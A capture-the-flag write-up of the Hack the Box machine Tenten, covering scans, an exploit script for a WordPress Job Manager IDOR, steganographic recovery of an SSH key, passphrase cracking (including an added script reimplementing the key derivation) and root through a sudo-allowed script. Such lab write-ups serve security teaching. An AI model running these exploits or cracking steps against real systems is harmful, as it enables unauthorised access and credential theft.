
【Hack the Box】Tenten - Write Up

Posted at 2020-09-23

Introduction

Hi, this is ikkyu, the kind of person who, when too busy to know where to start, drops everything and watches Nichijou instead.

If anything here is wrong, please let me know.

twitter: ikkyu (@ikk_hck)

Tenten

From the official HackTheBox page:
Screen Shot 2020-09-15 at 20.07.53.png

Tenten is a medium difficulty machine that requires some outside-the-box/CTF-style thinking to
complete. It demonstrates the severity of using outdated Wordpress plugins, which is a major
attack vector that exists in real life.

Scanning

nmap -sC -sV -Pn --script vuln 10.10.10.10 -oA nmap
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-15 07:10 EDT
Nmap scan report for 10.10.10.10
Host is up (0.28s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| vulners: 
|   cpe:/a:openbsd:openssh:7.2p2: 
|_      CVE-2014-9278   4.0     https://vulners.com/cve/CVE-2014-9278
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.10.10
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://10.10.10.10:80/
|     Form id: search-form-5f60a192c20b4
|     Form action: http://10.10.10.10/
|     
|     Path: http://10.10.10.10:80/index.php/jobs/
|     Form id: 
|     Form action: http://10.10.10.10/index.php/jobs/apply/
|     
|     Path: http://10.10.10.10:80/index.php/category/uncategorized/
|     Form id: search-form-5f60a19b8bd84
|     Form action: http://10.10.10.10/
|     
|     Path: http://10.10.10.10:80/wp-login.php
|     Form id: loginform
|     Form action: http://10.10.10.10/wp-login.php
|     
|     Path: http://10.10.10.10:80/index.php/2017/04/
|     Form id: search-form-5f60a19da5255
|     Form action: http://10.10.10.10/
|     
|     Path: http://10.10.10.10:80/index.php/jobs/%5c%22/
|     Form id: search-form-5f60a1a0f0ff4
|     Form action: http://10.10.10.10/
|     
|     Path: http://10.10.10.10:80/index.php/jobs/
|     Form id: 
|     Form action: http://10.10.10.10/index.php/jobs/apply/
|     
|     Path: http://10.10.10.10:80/index.php/jobs/apply/
|     Form id: 
|_    Form action: 
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|   /wp-login.php: Possible admin folder
|   /readme.html: Wordpress version: 2 
|   /: WordPress version: 4.7.3
|   /wp-includes/images/rss.png: Wordpress version 2.2 found.
|   /wp-includes/js/jquery/suggest.js: Wordpress version 2.5 found.
|   /wp-includes/images/blank.gif: Wordpress version 2.6 found.
|   /wp-includes/js/comment-reply.js: Wordpress version 2.7 found.
|   /wp-login.php: Wordpress login page.
|   /wp-admin/upgrade.php: Wordpress login page.
|_  /readme.html: WordPress version 4.7
| http-fileupload-exploiter: 
|   
|_    Failed to upload and execute a payload.
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-wordpress-users: 
| Username found: takis
|_Search stopped at ID #25. Increase the upper limit if necessary with 'http-wordpress-users.limit'
| vulners: 
|   cpe:/a:apache:http_server:2.4.18: 
|       CVE-2017-7679   7.5     https://vulners.com/cve/CVE-2017-7679
|       CVE-2017-7679   7.5     https://vulners.com/cve/CVE-2017-7679
|       CVE-2017-7668   7.5     https://vulners.com/cve/CVE-2017-7668
|       CVE-2017-7668   7.5     https://vulners.com/cve/CVE-2017-7668
|       CVE-2017-3169   7.5     https://vulners.com/cve/CVE-2017-3169
|       CVE-2017-3167   7.5     https://vulners.com/cve/CVE-2017-3167
|       CVE-2017-3167   7.5     https://vulners.com/cve/CVE-2017-3167
|       CVE-2019-0211   7.2     https://vulners.com/cve/CVE-2019-0211
|       CVE-2018-1312   6.8     https://vulners.com/cve/CVE-2018-1312
|       CVE-2018-1312   6.8     https://vulners.com/cve/CVE-2018-1312
|       CVE-2017-15715  6.8     https://vulners.com/cve/CVE-2017-15715
|       CVE-2019-10082  6.4     https://vulners.com/cve/CVE-2019-10082
|       CVE-2019-10082  6.4     https://vulners.com/cve/CVE-2019-10082
|       CVE-2017-9788   6.4     https://vulners.com/cve/CVE-2017-9788
|       CVE-2019-0217   6.0     https://vulners.com/cve/CVE-2019-0217
|       CVE-2020-1927   5.8     https://vulners.com/cve/CVE-2020-1927
|       CVE-2019-10098  5.8     https://vulners.com/cve/CVE-2019-10098
|       CVE-2020-1934   5.0     https://vulners.com/cve/CVE-2020-1934
|       CVE-2020-1934   5.0     https://vulners.com/cve/CVE-2020-1934
|       CVE-2019-0220   5.0     https://vulners.com/cve/CVE-2019-0220
|       CVE-2019-0220   5.0     https://vulners.com/cve/CVE-2019-0220
|       CVE-2019-0196   5.0     https://vulners.com/cve/CVE-2019-0196
|       CVE-2019-0196   5.0     https://vulners.com/cve/CVE-2019-0196
|       CVE-2018-17199  5.0     https://vulners.com/cve/CVE-2018-17199
|       CVE-2018-17199  5.0     https://vulners.com/cve/CVE-2018-17199
|       CVE-2018-1333   5.0     https://vulners.com/cve/CVE-2018-1333
|       CVE-2018-1333   5.0     https://vulners.com/cve/CVE-2018-1333
|       CVE-2017-9798   5.0     https://vulners.com/cve/CVE-2017-9798
|       CVE-2017-15710  5.0     https://vulners.com/cve/CVE-2017-15710
|       CVE-2016-8743   5.0     https://vulners.com/cve/CVE-2016-8743
|       CVE-2016-8740   5.0     https://vulners.com/cve/CVE-2016-8740
|       CVE-2016-4979   5.0     https://vulners.com/cve/CVE-2016-4979
|       CVE-2019-0197   4.9     https://vulners.com/cve/CVE-2019-0197
|       CVE-2020-11985  4.3     https://vulners.com/cve/CVE-2020-11985
|       CVE-2019-10092  4.3     https://vulners.com/cve/CVE-2019-10092
|       CVE-2019-10092  4.3     https://vulners.com/cve/CVE-2019-10092
|       CVE-2018-11763  4.3     https://vulners.com/cve/CVE-2018-11763
|       CVE-2018-11763  4.3     https://vulners.com/cve/CVE-2018-11763
|       CVE-2016-4975   4.3     https://vulners.com/cve/CVE-2016-4975
|       CVE-2016-4975   4.3     https://vulners.com/cve/CVE-2016-4975
|       CVE-2016-1546   4.3     https://vulners.com/cve/CVE-2016-1546
|       CVE-2018-1283   3.5     https://vulners.com/cve/CVE-2018-1283
|       CVE-2016-8612   3.3     https://vulners.com/cve/CVE-2016-8612
|_      CVE-2016-8612   3.3     https://vulners.com/cve/CVE-2016-8612
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 360.86 seconds

Open 10.10.10.10 in a browser
Screen Shot 2020-09-16 at 12.26.51.png

A stylish site built with WordPress appears.

wpscan

To learn more about the site, run wpscan.

wpscan --api-token ************** --url http://10.10.10.10 --enumerate u

An API token can be obtained from the WPScan site, which also documents wpscan's options in detail.

_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.6
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://10.10.10.10/ [10.10.10.10]
[+] Started: Wed Sep 16 02:03:28 2020

Interesting Finding(s):


[i] User(s) Identified:

[+] takis
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://10.10.10.10/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] WPVulnDB API OK
 | Plan: free
 | Requests Done (during the scan): 2
 | Requests Remaining: 40

[+] Finished: Wed Sep 16 02:04:01 2020
[+] Requests Done: 57
[+] Cached Requests: 7
[+] Data Sent: 13.198 KB
[+] Data Received: 492.172 KB
[+] Memory used: 115.363 MB
[+] Elapsed time: 00:00:33

Part of the output is omitted, but this turns up a user named takis. Enumerating plugins the same way:

wpscan --api-token ************** --url http://10.10.10.10 --enumerate p

[i] Plugin(s) Identified:

[+] job-manager
 | Location: http://10.10.10.10/wp-content/plugins/job-manager/
 | Latest Version: 0.7.25 (up to date)
 | Last Updated: 2015-08-25T22:44:00.000Z
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | [!] 1 vulnerability identified:
 |
 | [!] Title: Job Manager <= 0.7.25 -  Insecure Direct Object Reference (IDOR)
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8167
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6668
 |      - https://vagmour.eu/cve-2015-6668-cv-filename-disclosure-on-job-manager-wordpress-plugin/
 |
 | Version: 7.2.5 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://10.10.10.10/wp-content/plugins/job-manager/readme.txt

[+] WPVulnDB API OK
 | Plan: free
 | Requests Done (during the scan): 1
 | Requests Remaining: 39

[+] Finished: Wed Sep 16 02:11:43 2020
[+] Requests Done: 7
[+] Cached Requests: 35
[+] Data Sent: 1.591 KB
[+] Data Received: 38.797 KB
[+] Memory used: 175.387 MB
[+] Elapsed time: 00:00:06

As shown below, it also finds an IDOR vulnerability in Job Manager.

[!] Title: Job Manager <= 0.7.25 -  Insecure Direct Object Reference (IDOR)
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8167
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6668
 |      - https://vagmour.eu/cve-2015-6668-cv-filename-disclosure-on-job-manager-wordpress-plugin/

Back on the website, click Jobs Listing.

Screen Shot 2020-09-16 at 15.40.06.png
Click Pen Tester, then Apply Now.
Screen Shot 2020-09-16 at 15.42.15.png

10.10.10.10/index.php/jobs/apply/8/

Change the trailing number to 9 or 10 and a different page comes back: the "JOB APPLICATION:" heading at the top left is either missing or changes to something else, which means the ID is worth fuzzing. Right-click JOB APPLICATION, choose Inspect Element, confirm that the element is <h1 class="entry-title">, and then:

for i in $(seq 1 30); do echo -n "$i:"; curl -s http://10.10.10.10/index.php/jobs/apply/$i/ | grep '<h1 class="entry-title">'; done

echo -n suppresses the trailing newline; curl -s suppresses the progress meter.

1:              <h1 class="entry-title">Job Application: Hello world!</h1>                      </header><!-- .entry-header -->
2:              <h1 class="entry-title">Job Application: Sample Page</h1>                       </header><!-- .entry-header -->
3:              <h1 class="entry-title">Job Application: Auto Draft</h1>                        </header><!-- .entry-header -->
4:              <h1 class="entry-title">Job Application</h1>                    </header><!-- .entry-header -->
5:              <h1 class="entry-title">Job Application: Jobs Listing</h1>                      </header><!-- .entry-header -->
6:              <h1 class="entry-title">Job Application: Job Application</h1>                   </header><!-- .entry-header -->
7:              <h1 class="entry-title">Job Application: Register</h1>                  </header><!-- .entry-header -->
8:              <h1 class="entry-title">Job Application: Pen Tester</h1>                        </header><!-- .entry-header -->
9:              <h1 class="entry-title">Job Application:</h1>                   </header><!-- .entry-header -->
10:             <h1 class="entry-title">Job Application: Application</h1>                       </header><!-- .entry-header -->
11:             <h1 class="entry-title">Job Application: cube</h1>                      </header><!-- .entry-header -->
12:             <h1 class="entry-title">Job Application: Application</h1>                       </header><!-- .entry-header -->
13:             <h1 class="entry-title">Job Application: HackerAccessGranted</h1>                       </header><!-- .entry-header -->
14:             <h1 class="entry-title">Job Application</h1>                    </header><!-- .entry-header -->
15:             <h1 class="entry-title">Job Application</h1>                    </header><!-- .entry-header -->
16:             <h1 class="entry-title">Job Application</h1>                    </header><!-- .entry-header -->
17:             <h1 class="entry-title">Job Application</h1>                    </header><!-- .entry-header -->
18:             <h1 class="entry-title">Job Application</h1>                    </header><!-- .entry-header -->
19:             <h1 class="entry-title">Job Application</h1>                    </header><!-- .entry-header -->
20:             <h1 class="entry-title">Job Application</h1>                    </header><!-- .entry-header -->
21:             <h1 class="entry-title">Job Application</h1>                    </header><!-- .entry-header -->
22:             <h1 class="entry-title">Job Application</h1>                    </header><!-- .entry-header -->
23:             <h1 class="entry-title">Job Application</h1>                    </header><!-- .entry-header -->
24:             <h1 class="entry-title">Job Application</h1>                    </header><!-- .entry-header -->
25:             <h1 class="entry-title">Job Application</h1>                    </header><!-- .entry-header -->
26:             <h1 class="entry-title">Job Application</h1>                    </header><!-- .entry-header -->
27:             <h1 class="entry-title">Job Application</h1>                    </header><!-- .entry-header -->
28:             <h1 class="entry-title">Job Application</h1>                    </header><!-- .entry-header -->
29:             <h1 class="entry-title">Job Application</h1>                    </header><!-- .entry-header -->
30:             <h1 class="entry-title">Job Application</h1>                    </header><!-- .entry-header -->

ID 13 gives Job Application: HackerAccessGranted.
We use the exploit code from https://vagmour.eu/cve-2015-6668-cv-filename-disclosure-on-job-manager-wordpress-plugin/, the reference wpscan reported. Save the code as exploit.py.
Screenshot from 2020-09-17 19-53-10.png

Modify it as follows.

import requests

website = input('Enter a vulnerable website: ')
filename = input('Enter a file name: ')

# WordPress turns spaces in an uploaded file name into hyphens
filename2 = filename.replace(" ", "-")

# Uploads are stored under wp-content/uploads/YYYY/MM/, so try every month of
# every plausible year with each extension a CV is likely to have
for year in range(2013, 2019):
    for i in range(1, 13):
        for extension in ('png', 'jpeg', 'jpg', 'doc', 'pdf', 'docx'):
            URL = website + "/wp-content/uploads/" + str(year) + "/" + "{:02}".format(i) + "/" + filename2 + "." + extension
            req = requests.get(URL)
            if req.status_code == 200:
                print("[+] URL of CV found! " + URL)

The changes: the extension list is extended, raw_input is replaced with input, print is changed to the Python 3 function form, and the year range is widened.
Run it.

 python3 exploit.py 
Enter a vulnerable website: http://10.10.10.10
Enter a file name: HackerAccessGranted                                                 
[+] URL of CV found! http://10.10.10.10/wp-content/uploads/2017/04/HackerAccessGranted.jpg
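The two steps above, walking apply/<id>/ to read leaked post titles and then guessing the upload path, are combined below in one stdlib-only script. This is an added example, not the writeup's exploit.py or the vagmour.eu code. The point the curl loop and exploit.py leave implicit is that the apply page renders the title of whatever post ID it is handed, that the leaked title doubles as the CV's file name (as the exploit assumes), and that WordPress writes uploads to wp-content/uploads/YYYY/MM/ with spaces turned into hyphens, so the whole search space is enumerable. SAMPLE_PAGES, SAMPLE_CV_URL, fake_fetch and fake_status are constructed stand-ins so the script runs offline; http_get and http_status are my own helpers for a live run.

```python
import re
from itertools import product
from urllib.request import Request, urlopen
from urllib.error import HTTPError

TITLE_RE = re.compile(r'<h1 class="entry-title">(.*?)</h1>', re.S)
TITLE_PREFIX = "Job Application:"


def page_title(html):
    """Return the text of the first <h1 class="entry-title"> in a page, or None."""
    m = TITLE_RE.search(html)
    if not m:
        return None
    return re.sub(r"\s+", " ", m.group(1)).strip()


def leaked_post_title(h1_text):
    """'Job Application: <post title>' -> '<post title>'.

    The apply page renders the title of whatever post ID it is given; a bare
    'Job Application' (no colon) or an empty title means nothing leaked.
    """
    if not h1_text or not h1_text.startswith(TITLE_PREFIX):
        return None
    return h1_text[len(TITLE_PREFIX):].strip() or None


def enumerate_titles(fetch, base, ids):
    """Walk /index.php/jobs/apply/<id>/ and return {id: leaked title}.

    fetch(url) -> html string ('' for a missing page).
    """
    base = base.rstrip("/")
    found = {}
    for i in ids:
        title = leaked_post_title(page_title(fetch(f"{base}/index.php/jobs/apply/{i}/")))
        if title:
            found[i] = title
    return found


def candidate_cv_urls(base, title, years=range(2013, 2019), months=range(1, 13),
                      exts=("pdf", "doc", "docx", "png", "jpg", "jpeg")):
    """Every wp-content/uploads/YYYY/MM/<slug>.<ext> path a CV upload could have.

    WordPress files uploads by year/month and replaces spaces in the file
    name with hyphens, so the search space is small and ordered.
    """
    base = base.rstrip("/")
    slug = title.replace(" ", "-")
    return [f"{base}/wp-content/uploads/{y}/{m:02d}/{slug}.{e}"
            for y, m, e in product(years, months, exts)]


def find_cv(status_of, base, title, **kwargs):
    """Return the first candidate URL for which status_of(url) == 200, else None."""
    for url in candidate_cv_urls(base, title, **kwargs):
        if status_of(url) == 200:
            return url
    return None


# --- Constructed sample data (not captured from the machine) ----------------
# Trimmed versions of what the curl loop printed for IDs 8, 9, 13 and 14.
SAMPLE_PAGES = {
    8: '<header><h1 class="entry-title">Job Application: Pen Tester</h1></header>',
    9: '<header><h1 class="entry-title">Job Application:</h1></header>',
    13: '<header><h1 class="entry-title">Job Application: HackerAccessGranted</h1></header>',
    14: '<header><h1 class="entry-title">Job Application</h1></header>',
}
SAMPLE_CV_URL = "http://10.10.10.10/wp-content/uploads/2017/04/HackerAccessGranted.jpg"


def fake_fetch(url):
    """Offline stand-in for an HTTP GET: serve SAMPLE_PAGES by the ID in the URL."""
    m = re.search(r"/jobs/apply/(\d+)/", url)
    return SAMPLE_PAGES.get(int(m.group(1)), "") if m else ""


def fake_status(url):
    """Offline stand-in for a HEAD request: only the known CV path exists."""
    return 200 if url == SAMPLE_CV_URL else 404


# --- Live helpers (stdlib only) for running against the real target ----------
def http_get(url):
    try:
        with urlopen(Request(url), timeout=10) as r:
            return r.read().decode("utf-8", "replace")
    except HTTPError:
        return ""


def http_status(url):
    try:
        with urlopen(Request(url, method="HEAD"), timeout=10) as r:
            return r.getcode()
    except HTTPError as e:
        return e.code


if __name__ == "__main__":
    base = "http://10.10.10.10"
    titles = enumerate_titles(fake_fetch, base, range(1, 31))  # use http_get for a live run
    print(titles)  # {8: 'Pen Tester', 13: 'HackerAccessGranted'}
    for post_id, title in titles.items():
        print(post_id, title, find_cv(fake_status, base, title))  # use http_status live
```

Swap fake_fetch/fake_status for http_get/http_status to run it against the machine; the candidate list is deterministic, so a HEAD per URL (432 requests for the default ranges) is all the brute force costs.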

The image file HackerAccessGranted.jpg is found, so download it.

$ wget http://10.10.10.10/wp-content/uploads/2017/04/HackerAccessGranted.jpg
--2020-09-17 20:09:12--  http://10.10.10.10/wp-content/uploads/2017/04/HackerAccessGranted.jpg
Connecting to 10.10.10.10:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 262408 (256K) [image/jpeg]
Saving to: ‘HackerAccessGranted.jpg’

HackerAccessGranted.jpg                     100%[==========================================================================================>] 256.26K  38.9KB/s    in 6.6s    

2020-09-17 20:09:21 (38.9 KB/s) - ‘HackerAccessGranted.jpg’ saved [262408/262408]

Screenshot from 2020-09-17 20-21-36.png

It looks like an ordinary image, but it's a suspicious hooded figure. Probably steganography. So:

$ steghide extract -sf HackerAccessGranted.jpg
Enter passphrase: 
wrote extracted data to "id_rsa".

$ ls
exploit.py  HackerAccessGranted.jpg  id_rsa

The -sf on the first line specifies the stego file; the other options are covered in the steghide documentation. Note that the passphrase prompt was simply left empty: the data had been embedded without one.

$ cat id_rsa 
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,7265FC656C429769E4C1EEFC618E660C
...
-----END RSA PRIVATE KEY-----

We get a private key named id_rsa, the kind commonly used for SSH. But as the Proc-Type: 4,ENCRYPTED and DEK-Info headers show, it is encrypted and unusable without its passphrase, so we first try to recover that.

$ python3 /john/ssh2john.py  id_rsa > hash
/john/ssh2john.py:103: DeprecationWarning: decodestring() is a deprecated alias since Python 3.1, use decodebytes()
  data = base64.decodestring(data)

First, ssh2john.py converts the key into a hash john can work with.

$ sudo john hash -wordlist=rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 8 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
superpassword    (id_rsa)
Warning: Only 1 candidate left, minimum 8 needed for performance.
1g 0:00:00:02 DONE (2020-09-23 14:23) 0.4273g/s 6128Kp/s 6128Kc/s 6128KC/s *7¡Vamos!
Session completed
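Why did rockyou.txt crack this key in two seconds? The john output says so: Cost 1 is 0 (MD5/AES) and the iteration count is 1, i.e. the legacy OpenSSL PEM format derives the AES key from the passphrase with a single MD5 (EVP_BytesToKey) and takes the IV straight from the DEK-Info header, so every guess costs one hash. The script below, an added example rather than anything from ssh2john or the writeup, reproduces that derivation and the candidate-checking loop. The AES-CBC decryption itself is left to a caller-supplied decrypt_cbc (the cryptography package provides one); SAMPLE_PEM reuses the page's headers over a constructed 32-byte body, and fake_decrypt is an offline stand-in that answers as if superpassword were correct. The caveat worth knowing: keys written in the OpenSSH private key format (ssh-keygen -o, the default since OpenSSH 7.8) use a bcrypt KDF instead, which john lists as cost 2 and which is orders of magnitude slower per guess.

```python
import base64
import hashlib
import re

# Key length in bytes for the ciphers the legacy PEM format commonly uses.
KEY_LEN = {"AES-128-CBC": 16, "AES-192-CBC": 24, "AES-256-CBC": 32, "DES-EDE3-CBC": 24}


def parse_dek_info(pem_text):
    """Return (cipher_name, iv_bytes) from a 'Proc-Type: 4,ENCRYPTED' PEM header block."""
    m = re.search(r"^DEK-Info:\s*([A-Z0-9-]+),([0-9A-Fa-f]+)\s*$", pem_text, re.M)
    if not m:
        raise ValueError("no DEK-Info header: not a legacy encrypted PEM key")
    return m.group(1), bytes.fromhex(m.group(2))


def pem_body(pem_text):
    """Base64-decode the ciphertext between the BEGIN/END lines, skipping header lines."""
    lines = [ln.strip() for ln in pem_text.splitlines()]
    b64 = [ln for ln in lines if ln and not ln.startswith("-----") and ":" not in ln]
    return base64.b64decode("".join(b64))


def evp_bytes_to_key(passphrase, salt, key_len):
    """OpenSSL's EVP_BytesToKey with MD5 and a single iteration.

    D_1 = MD5(pass || salt), D_i = MD5(D_{i-1} || pass || salt); key = D_1 || D_2 || ...
    One MD5 per candidate is why john reports millions of candidates per second.
    """
    out, prev = b"", b""
    while len(out) < key_len:
        prev = hashlib.md5(prev + passphrase + salt).digest()
        out += prev
    return out[:key_len]


def derive_key_iv(passphrase, cipher, iv):
    """Legacy PEM scheme: the IV is the DEK-Info value, the salt is its first 8 bytes."""
    return evp_bytes_to_key(passphrase.encode(), iv[:8], KEY_LEN[cipher]), iv


def looks_like_der_key(plaintext):
    """A correctly decrypted key starts with a DER SEQUENCE (0x30) whose length is in
    long form (0x81 or 0x82) for any realistic RSA key size."""
    return len(plaintext) >= 4 and plaintext[0] == 0x30 and plaintext[1] in (0x81, 0x82)


def crack(pem_text, candidates, decrypt_cbc):
    """Return the first candidate whose derived key yields a DER-shaped first block.

    decrypt_cbc(key, iv, ciphertext) -> plaintext must be supplied; for AES,
    cryptography's Cipher(algorithms.AES(key), modes.CBC(iv)) does it. Only the
    first 16-byte block is decrypted: that is all the check needs, and such a
    shallow structural check is also why john warns about false positives.
    """
    cipher, iv = parse_dek_info(pem_text)
    first_block = pem_body(pem_text)[:16]
    for cand in candidates:
        key, _ = derive_key_iv(cand, cipher, iv)
        if looks_like_der_key(decrypt_cbc(key, iv, first_block)):
            return cand
    return None


# --- Constructed sample (the page does not reproduce the real key body) ------
# Headers copied from the page's id_rsa; the body is 32 placeholder bytes.
SAMPLE_PEM = (
    "-----BEGIN RSA PRIVATE KEY-----\n"
    "Proc-Type: 4,ENCRYPTED\n"
    "DEK-Info: AES-128-CBC,7265FC656C429769E4C1EEFC618E660C\n"
    "\n"
    + base64.b64encode(b"\x00" * 32).decode() + "\n"
    "-----END RSA PRIVATE KEY-----\n"
)


def fake_decrypt(key, iv, ciphertext):
    """Offline stand-in for AES-CBC: behaves as if 'superpassword' were the right key."""
    expected, _ = derive_key_iv("superpassword", "AES-128-CBC", iv)
    return b"\x30\x82\x04\xa3" + b"\x00" * 12 if key == expected else b"\xff" * 16


if __name__ == "__main__":
    print(crack(SAMPLE_PEM, ["123456", "password", "superpassword"], fake_decrypt))  # superpassword
```

With a real wordlist and an AES-CBC decrypt_cbc built on cryptography, crack() reproduces john's result on the actual id_rsa; with the stand-ins it returns superpassword from the three-word list.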

The passphrase is superpassword. Restrict the key file's permissions (ssh refuses a private key that other users can read) and SSH in.

$ chmod 600 id_rsa 

$ ssh -i id_rsa takis@10.10.10.10
Enter passphrase for key 'id_rsa': 
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

65 packages can be updated.
39 updates are security updates.


Last login: Fri May  5 23:05:36 2017

The username takis is the one found during the wpscan run.

Privilege escalation

$ id
uid=1000(takis) gid=1000(takis) groups=1000(takis),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),117(lpadmin),118(sambashare)

takis is in the sudo group (and also lxd, which is itself a well-known privilege-escalation path, though not needed here), so check what sudo allows.

$ sudo -l
Matching Defaults entries for takis on tenten:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User takis may run the following commands on tenten:
    (ALL : ALL) ALL
    (ALL) NOPASSWD: /bin/fuckin

There is a file we can run without a password. The first entry, (ALL : ALL) ALL, would also give root but requires takis's password, which we don't have; the NOPASSWD entry does not. Run it.

$ sudo /bin/fuckin

No response, so pass some arbitrary text as an argument.

takis@tenten:~$ sudo /bin/fuckin aaaaa
/bin/fuckin: line 2: aaaaa: command not found

The error "line 2: aaaaa: command not found" shows it's a shell script whose second line executes its arguments as a command, so:

takis@tenten:~$ sudo /bin/fuckin whoami
root

The command runs with root privileges, so use "su -" to become root.
takis@tenten:~$ sudo /bin/fuckin su -


Finally, print root.txt.

root@tenten:~# ls
root.txt
root@tenten:~# cat root.txt

Good work. See you next time.